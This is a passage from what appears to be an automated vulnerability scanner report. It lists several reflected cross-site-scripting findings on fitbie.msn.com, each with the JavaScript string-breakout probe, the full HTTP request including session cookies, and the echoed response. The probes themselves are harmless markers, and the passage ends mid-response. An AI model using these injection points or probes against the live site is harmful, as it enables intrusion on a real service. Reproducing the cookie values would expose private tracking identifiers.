Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:30 +0000
ETag: "1297607190-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:31 GMT
Date: Sun, 13 Feb 2011 14:26:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultf8b60';c24714b7ad8?destination=node%2Fdefaultf8b60';c24714b7ad8&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.64. http://fitbie.msn.com/sites/default/files/78322433-TH.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/78322433-TH.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 590a7'%3ba29870cedcf was submitted in the REST URL parameter 2. This input was echoed as 590a7';a29870cedcf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default590a7'%3ba29870cedcf/files/78322433-TH.jpg?1288040105 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:35 +0000
ETag: "1297607195-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:36 GMT
Date: Sun, 13 Feb 2011 14:26:36 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default590a7';a29870cedcf?destination=node%2Fdefault590a7';a29870cedcf&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.65. http://fitbie.msn.com/sites/default/files/78376830-TH_0.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/78376830-TH_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77e8d'%3b17f5c78b96d was submitted in the REST URL parameter 2. This input was echoed as 77e8d';17f5c78b96d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default77e8d'%3b17f5c78b96d/files/78376830-TH_0.jpg?1290555739 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/fat-burning-workouts
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:31 +0000
ETag: "1297607371-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:31 GMT
Date: Sun, 13 Feb 2011 14:29:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default77e8d';17f5c78b96d?destination=node%2Fdefault77e8d';17f5c78b96d&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.66. http://fitbie.msn.com/sites/default/files/78462963-TH.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/78462963-TH.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de040'%3b81b6c737b62 was submitted in the REST URL parameter 2. This input was echoed as de040';81b6c737b62 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/defaultde040'%3b81b6c737b62/files/78462963-TH.jpg?1287438041 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:32 +0000
ETag: "1297607192-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:32 GMT
Date: Sun, 13 Feb 2011 14:26:32 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultde040';81b6c737b62?destination=node%2Fdefaultde040';81b6c737b62&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.67. http://fitbie.msn.com/sites/default/files/80448801-TH_0.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/80448801-TH_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7569'%3b986424614ec was submitted in the REST URL parameter 2. This input was echoed as f7569';986424614ec in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/defaultf7569'%3b986424614ec/files/80448801-TH_0.jpg?1290557298 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/fat-burning-workouts
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:31 +0000
ETag: "1297607371-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:31 GMT
Date: Sun, 13 Feb 2011 14:29:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultf7569';986424614ec?destination=node%2Fdefaultf7569';986424614ec&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.68. http://fitbie.msn.com/sites/default/files/99812364-th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/99812364-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 517fa'%3b8fd213883e7 was submitted in the REST URL parameter 2. This input was echoed as 517fa';8fd213883e7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default517fa'%3b8fd213883e7/files/99812364-th.jpg?1287593544 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/fat-burning-workouts
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:31 +0000
ETag: "1297607371-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:32 GMT
Date: Sun, 13 Feb 2011 14:29:32 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default517fa';8fd213883e7?destination=node%2Fdefault517fa';8fd213883e7&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.69. http://fitbie.msn.com/sites/default/files/99832032-th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/99832032-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4a73'%3bd37abfa21e5 was submitted in the REST URL parameter 2. This input was echoed as d4a73';d37abfa21e5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/defaultd4a73'%3bd37abfa21e5/files/99832032-th.jpg?1287595555 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/fat-burning-workouts
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:35 +0000
ETag: "1297607375-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:35 GMT
Date: Sun, 13 Feb 2011 14:29:35 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaultd4a73';d37abfa21e5?destination=node%2Fdefaultd4a73';d37abfa21e5&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.70. http://fitbie.msn.com/sites/default/files/MM_chinup_B-male-th_0.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/MM_chinup_B-male-th_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8120'%3b98e70ce71e7 was submitted in the REST URL parameter 2. This input was echoed as b8120';98e70ce71e7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/defaultb8120'%3b98e70ce71e7/files/MM_chinup_B-male-th_0.jpg?1287593020 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:15 +0000
ETag: "1297607175-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:15 GMT
Date: Sun, 13 Feb 2011 14:26:15 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
